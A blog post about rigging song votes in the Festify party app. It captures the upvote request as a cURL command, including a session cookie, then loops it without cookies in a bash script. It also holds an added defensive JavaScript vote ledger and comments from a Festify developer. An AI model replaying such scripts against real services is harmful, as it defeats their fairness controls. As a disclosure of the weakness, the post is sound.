This is why we can’t have nice things! // Hack the party

Recently we started using Festify at our student fraternity Gumbo Millennium. Festify is a really cool app that lets your guests choose what songs they want to hear and prevents a lot of discussion about “what to play next”.

Festify is a free Spotify-powered app that lets your guests choose which music should be played using their smartphones.

But democracy doesn’t work when you want to hear your favourite song!

Step 1 – Setup and installation

Festify is really easy to install. You just need the software, Spotify and a Spotify Premium account. After that you can invite guests to the party or they can go to festify.us and enter the party ID.

Step 2 – Adding that funky jam

After joining a party you can add songs and vote on songs other people have added. See them rise to the top and hope that your song hits the dance floor! Festify doesn’t require registration to vote, and this is where the fun starts! Festify uses cookies to register your vote and to prevent you from forcing your music on other people. Cookies? Let’s get started!

Step 3 – Capturing the upvote

After adding a song to the queue you can’t vote on it. But that’s easily solved: delete your cookies, hard refresh, and you’re able to up-vote the song you just added. Using Chrome Developer Tools you can capture the POST request that up-votes the song.


After copying this as a cURL request we get:

curl 'http://festify.us/api/parties/57d58ed9a27km0a6640ve8ec/queue' -H 'Origin: http://festify.us' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-GB,en-US;q=0.8,en;q=0.6' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36' -H 'Content-Type: application/json;charset=UTF-8' -H 'Accept: application/json, text/plain, */*' -H 'Referer: http://festify.us/57d58ed9a27km0a6640ve8ec' -H 'Cookie: _ga=GA1.2.1227056308.1473749685; _gat=1; connect.sid=s%3AplGQJeKPXu4gzDbLG4PokrG55TKBtBfF.5xiePNNfCVCO7e2KTQ5DW9meQOy81CRdNd26o%2Bvdyu4' -H 'Connection: keep-alive' --data-binary $'{"name":"I\'m Too Sexy","spotifyID":"2WElktskrNJEwgpp5Vouxk"}' --compressed

Step 4 – Edit the vote and fire the lazer

After capturing the request, it’s easy to remove the Cookie header from the cURL command:

'Cookie: _ga=GA1.2.1227056308.1473749685; _gat=1; connect.sid=s%3AplGQJeKPXu4gzDbLG4PokrG55TKBtBfF.5xiePNNfCVCO7e2KTQ5DW9meQOy81CRdNd26o%2Bvdyu4'

And put it in a script:

#!/bin/bash
x=1
while [ "$x" -le 99 ]
do
  echo "Up-voted $x times"

  curl 'http://festify.us/api/parties/57d16e88a27dd0a66ec/queue' -H 'Origin: http://festify.us' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-GB,en-US;q=0.8,en;q=0.6' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36' -H 'Content-Type: application/json;charset=UTF-8' -H 'Accept: application/json, text/plain, */*' -H 'Referer: http://festify.us/57d16e88a27dd0a66ec'  -H 'Connection: keep-alive' --data-binary '{"name":"Afro Circus/I Like To Move It","spotifyID":"0qNBowxGCvy2mSbg9kmEua"}' --compressed

  x=$((x + 1))
done

echo "AFRO"
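
The server-side counterpart to the loop above, as an added example that is not part of the original post and not Festify's code: a hypothetical `VoteLedger` that ignores votes from requests arriving without an already-established session and caps how many votes one client address can add to a track per minute. The class, field names, thresholds and sample traffic are assumptions made for illustration.

```javascript
// Added example: hypothetical vote ledger, not Festify's own code.
const WINDOW_MS = 60000;   // assumed window per client address and track
const MAX_PER_WINDOW = 5;  // assumed cap; guests on one Wi-Fi share an address

class VoteLedger {
  constructor() {
    this.voted = new Set();   // "session|track" pairs already counted
    this.recent = new Map();  // "ip|track" -> timestamps of accepted votes
    this.counts = new Map();  // track -> accepted vote total
  }

  // sessionId is null when the request carried no session cookie;
  // sessionIsNew is true when the session was created by this very request.
  castVote({ sessionId, sessionIsNew, ip, trackId, now }) {
    if (!sessionId || sessionIsNew) return 'rejected:no-established-session';
    const pair = `${sessionId}|${trackId}`;
    if (this.voted.has(pair)) return 'rejected:duplicate';
    const key = `${ip}|${trackId}`;
    const stamps = (this.recent.get(key) || []).filter(t => now - t < WINDOW_MS);
    this.recent.set(key, stamps);
    if (stamps.length >= MAX_PER_WINDOW) return 'rejected:rate-limited';
    stamps.push(now);
    this.voted.add(pair);
    this.counts.set(trackId, (this.counts.get(trackId) || 0) + 1);
    return 'accepted';
  }

  total(trackId) { return this.counts.get(trackId) || 0; }
}

// Constructed traffic: 99 cookie-less POSTs (the loop above), one returning
// guest voting twice, then 20 established sessions behind one address.
function simulate() {
  const ledger = new VoteLedger();
  const trackId = '0qNBowxGCvy2mSbg9kmEua';  // spotifyID from the script above
  const ip = '203.0.113.7';                  // documentation address (constructed)
  const results = [];
  for (let i = 0; i < 99; i++) {
    results.push(ledger.castVote({ sessionId: null, sessionIsNew: true, ip, trackId, now: i * 100 }));
  }
  const guest = { sessionId: 'guest-1', sessionIsNew: false, ip: '198.51.100.4', trackId };
  results.push(ledger.castVote({ ...guest, now: 10000 }));
  results.push(ledger.castVote({ ...guest, now: 11000 }));
  for (let i = 0; i < 20; i++) {
    results.push(ledger.castVote({ sessionId: `s${i}`, sessionIsNew: false, ip, trackId, now: 20000 + i * 100 }));
  }
  return { results, total: ledger.total(trackId) };
}
```

The per-address cap limits the rate of new voters rather than identifying them, so it has to be loose enough for a room full of guests sharing one Wi-Fi address.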


Thank you Roelof for making this possible.


2 thoughts on “This is why we can’t have nice things! // Hack the party”

  1. You can leave a lot of the headers you’re sending out of the cURL request, and it would still work :D

    As one of the developers of Festify, it was difficult to use a system that wouldn’t require authentication yet allow a single user to vote only once. Checking by IP address wouldn’t work as multiple devices often share one external IP and requiring social login or, worse, a separate account, would be too much trouble for many users to start voting.

    So, we went with cookies, which works most of the time – except when you hack it, of course ;)
    It’s the easiest way to identify people uniquely and to assure that a normal person doesn’t vote multiple times. Usually, this works just fine.

    We’re thinking about integrating optional social login, so the party admin can decide if users should be allowed to vote anonymously or not. However, this can take some time as Spotify currently doesn’t support third party desktop developers anymore.

    Have fun and party on 🎉

    • Hey Leo,

      First of all, thanks so much for replying! Really appreciate it! I totally understand the decision to use cookies. You don’t want anything in the way of people using the app.

      Social logon would be a good option and the option in the admin even better!

      Hope you will find a way to improve the app even if Spotify dropped 3rd party support. Our student fraternity really loves the app and we are having so much fun with it!

      Rock on!
